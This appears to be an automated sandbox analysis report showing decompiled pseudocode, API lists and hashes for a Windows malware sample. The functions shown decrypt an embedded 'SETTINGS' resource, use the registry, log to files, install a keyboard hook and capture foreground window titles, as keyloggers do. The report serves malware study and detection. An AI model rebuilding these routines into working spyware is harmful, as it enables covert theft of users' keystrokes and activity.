                                  				 *_t24 =  *0x41c260;
                                  				 *0x41c268 = _adjust_fdiv;
                                  				_t27 = E00404F3A( *_adjust_fdiv);
                                  				_t60 =  *0x41b190; // 0x1
                                  				if(_t60 == 0) {
                                  					__setusermatherr(E0041412C);
                                  					_pop(_t47);
                                  				}
                                  				E0041411A(_t27);
                                  				_push(0x41b0e8);
                                  				_push(0x41b0e4);
                                  				L00414114();
                                  				_v112 =  *0x41c25c;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
                                  				_push(0x41b0e0);
                                  				_push(0x41b000); // executed
                                  				L00414114(); // executed
                                  				_t54 =  *_acmdln;
                                  				_v120 = _t54;
                                  				if( *_t54 != 0x22) {
                                  					while(1) {
                                  						__eflags =  *_t54 - 0x20;
                                  						if(__eflags <= 0) {
                                  							goto L7;
                                  						}
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				} else {
                                  					do {
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  						_t42 =  *_t54;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t54 == 0x22) {
                                  						L6:
                                  						_t54 = _t54 + 1;
                                  						_v120 = _t54;
                                  					}
                                  				}
                                  				L7:
                                  				_t36 =  *_t54;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				_t68 = _v96.dwFlags & 0x00000001;
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
                                  				_v108 = _t40;
                                  				exit(_t40);
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L0041410E();
                                  				return _t41;
                                  			}
Decompiler address map for _entry_ (one instruction address per line of the C code above, collapsed into a range; unresolved lines were listed as 0x00000000): 0x00413fa7 .. 0x004140f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                  • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00409823(intOrPtr _a4) {
                                  				unsigned int _v8;
                                  				signed char* _v12;
                                  				char _v13;
                                  				void* _v20;
                                  				void* _v24;
                                  				char _v40;
                                  				void* _v56;
                                  				char _v1080;
                                  				void* _t36;
                                  				signed int _t38;
                                  				signed int _t42;
                                  				int _t51;
                                  				signed int _t54;
                                  				signed int _t55;
                                  				signed int _t66;
                                  				signed char* _t76;
                                  				void* _t83;
                                  				void* _t88;
                                  				void* _t89;
                                  
                                  				_v12 = _v12 & 0x00000000;
                                  				_v8 = E00409D02( &_v12);
                                  				_t51 =  *_v12 & 0x000000ff;
                                  				_t36 = malloc(_t51);
                                  				_t76 = _v12;
                                  				_t54 = _t51;
                                  				_t7 = _t76 + 1; // 0x1
                                  				_t88 = _t7;
                                  				_v24 = _t36;
                                  				_t55 = _t54 >> 2;
                                  				memcpy(_t36, _t88, _t55 << 2);
                                  				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13); // executed
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
                                  				_t83 = malloc(_v8);
                                  				_t42 = _v12;
                                  				_v20 = _t83;
                                  				_t20 = _t42 + 1; // 0x1
                                  				_t89 = _t51 + _t20;
                                  				_t66 = _v8 >> 2;
                                  				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
                                  				E00402F9B( &_v1080, _v24, _t51);
                                  				E0040309E( &_v1080,  &_v40, _v20, _v8);
                                  				free(_v20);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _a4;
                                  			}

                                  APIs
                                    • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                    • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                    • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                    • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  • malloc.MSVCRT ref: 00409846
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                  • malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                  • String ID:
                                  • API String ID: 531887698-0
                                  • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                  • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
                                  				char* _t13;
                                  				long _t15;
                                  				void* _t18;
                                  				int _t19;
                                  				void* _t25;
                                  
                                  				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
                                  				if(_t13 != 0) {
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 0;
                                  				} else {
                                  					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t19 = 0;
                                  					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
                                  					RegCloseKey(_a8);
                                  					if(_t15 == 0) {
                                  						_t19 = 1;
                                  					}
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t19;
                                  				}
                                  			}

                                  APIs
                                  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                  • RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                  • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 2159132150-0
                                  • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                  • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E00405532(void* __ecx) {
                                  				signed int _t8;
                                  				WCHAR* _t9;
                                  				long _t12;
                                  				void* _t21;
                                  				void* _t22;
                                  				void* _t28;
                                  
                                  				_t8 =  *0x41b988; // 0x989680
                                  				_t9 = _t8 |  *0x41b98c;
                                  				_t22 = __ecx;
                                  				if(_t9 != 0) {
                                  					 *((char*)(__ecx + 0x30)) = 0;
                                  					do {
                                  						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                  						_t21 = _t9;
                                  						if(_t21 == 0xffffffff) {
                                  							 *((char*)(_t22 + 0x30)) = 0;
                                  						} else {
                                  							_t12 = GetFileSize(_t21, 0);
                                  							_t28 = 0 -  *0x41b98c; // 0x0
                                  							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
                                  								 *((char*)(_t22 + 0x30)) = 1;
                                  								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
                                  									E00405D50(_t22);
                                  								}
                                  								Sleep(0x2710);
                                  							}
                                  							_t9 = FindCloseChangeNotification(_t21); // executed
                                  						}
                                  					} while ( *((char*)(_t22 + 0x30)) == 1);
                                  					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
                                  						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
                                  						return E00405180(_t22);
                                  					}
                                  				}
                                  				return _t9;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                  • CreateFileW.KERNEL32(00000000), ref: 00405569
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                  • Sleep.KERNEL32(00002710), ref: 004055A7
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 004055AE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@ChangeCloseCreateFindNotificationSizeSleepV01@@
                                  • String ID:
                                  • API String ID: 3579047504-0
                                  • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                  • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
                                  				long _v8;
                                  				long _v12;
                                  				intOrPtr _t14;
                                  				void* _t15;
                                  				int _t17;
                                  				long _t19;
                                  				long _t20;
                                  				long _t22;
                                  				long _t24;
                                  				void* _t28;
                                  
                                  				_t24 = 0;
                                  				_t14 = _a16;
                                  				if(_t14 == 0) {
                                  					_v12 = 0x40000000;
                                  					_v8 = 2;
                                  				} else {
                                  					if(_t14 == 1) {
                                  						_t22 = 4;
                                  						_v12 = _t22;
                                  						_v8 = _t22;
                                  					}
                                  				}
                                  				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
                                  				_t28 = _t15;
                                  				if(_t28 != 0xffffffff) {
                                  					if(_a16 != 1) {
                                  						L8:
                                  						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
                                  						if(_t17 != 0) {
                                  							_t24 = 1;
                                  						}
                                  						L10:
                                  						FindCloseChangeNotification(_t28); // executed
                                  						_t19 = _t24;
                                  						goto L11;
                                  					}
                                  					_t20 = SetFilePointer(_t28, _t24, _t24, 2); // executed
                                  					if(_t20 == 0xffffffff) {
                                  						goto L10;
                                  					}
                                  					goto L8;
                                  				} else {
                                  					_t19 = 0;
                                  					L11:
                                  					return _t19;
                                  				}
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00412DC6
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 00412DD3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                  • String ID:
                                  • API String ID: 175865374-0
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.KERNEL32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                  • RegQueryValueExA.KERNEL32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                  • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 2462357041-0
                                  • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                  • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004052D5(struct HHOOK__** __ecx) {
                                  				struct tagMSG _v32;
                                  				struct HHOOK__* _t11;
                                  				struct HHOOK__** _t14;
                                  
                                  				_t14 = __ecx;
                                  				 *0x41b9a8 = __ecx;
                                  				if( *((intOrPtr*)(__ecx)) != 0) {
                                  					L3:
                                  					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                  						TranslateMessage( &_v32);
                                  						DispatchMessageA( &_v32);
                                  						goto L2;
                                  					}
                                  				} else {
                                  					_t11 = SetWindowsHookExA(0xd, E004052BA, 0, 0); // executed
                                  					 *_t14 = _t11;
                                  					L2:
                                  					if( *_t14 != 0) {
                                  						goto L3;
                                  					}
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B692(void* _a4, void* _a8, char* _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28) {
                                  				char _v1028;
                                  				long _t16;
                                  				long _t19;
                                  
                                  				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                  				if(_t16 != 0) {
                                  					L3:
                                  					return 0;
                                  				} else {
                                  					_t19 = RegQueryValueExA(_a8, _a12, 0, 0, _a16,  &_a20); // executed
                                  					RegCloseKey(_a8);
                                  					if(_t19 != 0) {
                                  						goto L3;
                                  					} else {
                                  						E00402F9B( &_v1028, _a24, _a28);
                                  						E00403010( &_v1028, _a16, _a20);
                                  						return 1;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                  • RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                  • RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction ID: 12c492740cd6cd608dd50e7b32a974a13a24a52f7ce3ce9e30b48251fadff788
                                  • Opcode Fuzzy Hash: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction Fuzzy Hash: CA01FB35100209FFDF119F90EC05FDA3B75FB88758F008025FA14A61A0D775D925EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                  				int _v8;
                                  				int _v12;
                                  				int _t14;
                                  				long _t16;
                                  				long _t20;
                                  				signed int _t21;
                                  
                                  				_t14 = 4;
                                  				_v8 = _t14;
                                  				_v12 = _t14;
                                  				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                  				if(_t16 != 0) {
                                  					return 0;
                                  				} else {
                                  					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
                                  					_t21 = RegCloseKey(_a8); // executed
                                  					return _t21 & 0xffffff00 | _t20 == 0x00000000;
                                  				}
                                  			}


                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                  • RegQueryValueExA.KERNEL32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                  • RegCloseKey.KERNEL32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                  • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00412660(intOrPtr _a4) {
                                  				char _v5;
                                  				short _v520;
                                  				struct HWND__* _t6;
                                  
                                  				_t6 = GetForegroundWindow(); // executed
                                  				GetWindowTextW(_t6,  &_v520, 0x200);
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v520,  &_v5);
                                  				return _a4;
                                  			}


                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00412669
                                  • GetWindowTextW.USER32 ref: 0041267C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412690
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@Window$??0?$basic_string@ForegroundG@1@@G@2@@std@@G@std@@TextU?$char_traits@
                                  • String ID:
                                  • API String ID: 3479648101-0
                                  • Opcode ID: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                  • Instruction ID: 64d1ce8039e3a540394b6b1977bfd4dfbb3997696942590b923d2ce918142fcd
                                  • Opcode Fuzzy Hash: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                  • Instruction Fuzzy Hash: 40E0ECB950030FEBDB04EBA0ED4DED9777CAB44309F0081A1B61697191DA74A6498F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004122C4(intOrPtr* _a4) {
                                  				struct _MEMORYSTATUSEX _v68;
                                  				intOrPtr* _t8;
                                  
                                  				_v68.dwLength = 0x40;
                                  				GlobalMemoryStatusEx( &_v68); // executed
                                  				_t8 = _a4;
                                  				 *_t8 = _v68.ullTotalPhys;
                                  				 *((intOrPtr*)(_t8 + 4)) = _v68.ullAvailPhys;
                                  				return _t8;
                                  			}


                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 004122D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID: @
                                  • API String ID: 1890195054-2766056989
                                  • Opcode ID: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                  • Instruction ID: 75f814dcae9d38af4eaa51e93271515a162649f50c927f4fe6c9e38d045eb332
                                  • Opcode Fuzzy Hash: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                  • Instruction Fuzzy Hash: E8D067B8901308DFCB04DF94D54999CBBB9BB48344F404058E906A7350DB74E905CA95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                  • String ID:
                                  • API String ID: 4160275866-0
                                  • Opcode ID: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                  • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
